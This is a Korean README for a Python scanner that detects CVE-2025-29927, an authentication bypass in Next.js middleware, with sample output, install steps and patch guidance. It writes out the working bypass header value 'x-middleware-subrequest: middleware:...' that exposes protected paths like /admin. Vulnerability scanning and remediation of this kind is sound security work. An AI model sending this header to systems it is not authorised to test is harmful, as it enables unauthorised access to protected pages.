
🔐 CVE-2025-29927 — Next.js 미들웨어 인증 우회 취약점을 위한 Python 기반 스마트 스캐너. 메타 리프레시, 키워드 기반 리다이렉트 등을 탐지합니다.
이 Python 기반 스마트 스캐너는 Next.js 애플리케이션에서 CVE-2025-29927 취약점을 탐지하는 데 도움을 줍니다. 이는 공격자가 조작된 HTTP 헤더를 사용해 인증을 우회할 수 있게 하는 심각한 미들웨어 우회 취약점입니다.
🧠 이 도구는 HTTP 리디렉션뿐만 아니라
<meta http-equiv="refresh">와 같은 클라이언트 측 리디렉션 메커니즘, 키워드 기반 로그인 리디렉션, 무음 인증 우회까지 식별합니다.
x-middleware-subrequest 우회 헤더<meta refresh> 기반 리디렉션login, sign in, authentication과 같은 키워드를 포함한 HTML 콘텐츠$ python3 CVE-2025-29927.py
🌐 Enter the target site URL (e.g. http://localhost:3000): http://vulnerable.local
📁 Enter the protected path (e.g. /dashboard): /admin
→ Testing with header: middleware:middleware:middleware:middleware:middleware
↳ HTTP Status: 200
↳ Redirect detected: No
✅ VULNERABLE! Bypass successful with header:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
git clone https://github.com/sagsooz/CVE-2025-29927.git
cd CVE-2025-29927
pip install -r requirements.txt
python3 CVE-2025-29927.py
.
├── CVE-2025-29927.py # Main interactive scanner
├── requirements.txt # Python dependencies
└── README.md # This file
requests
beautifulsoup4
colorama
앱이 영향을 받는 경우 다음을 수행하세요:
v15.2.3 이상(또는 14.2.25+ / 13.5.7+) 으로 업데이트하세요.x-middleware-subrequest 헤더를 제거하세요:proxy_set_header x-middleware-subrequest "";
CVE-2025-29927은 공격자가 x-middleware-subrequest 헤더를 다음과 같은 조작된 값으로 변조하여 Next.js 미들웨어 검사를 우회할 수 있게 합니다:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
취약한 버전에서는 이로 인해 미들웨어 실행이 완전히 비활성화되어 /dashboard, /admin 등과 같은 보호된 경로에 직접 접근할 수 있게 됩니다.
유지관리자: @mrzblackhat
제안, 개선 또는 기여 사항이 있으면 언제든지 Telegram으로 연락 주세요.
next.js CVE-2025-29927 버그바운티 미들웨어 우회 인증 웹 보안 python 보안 스캐너 모의 해킹
이 도구는 교육 및 연구 목적으로만 제공됩니다. 책임감 있게 사용하세요.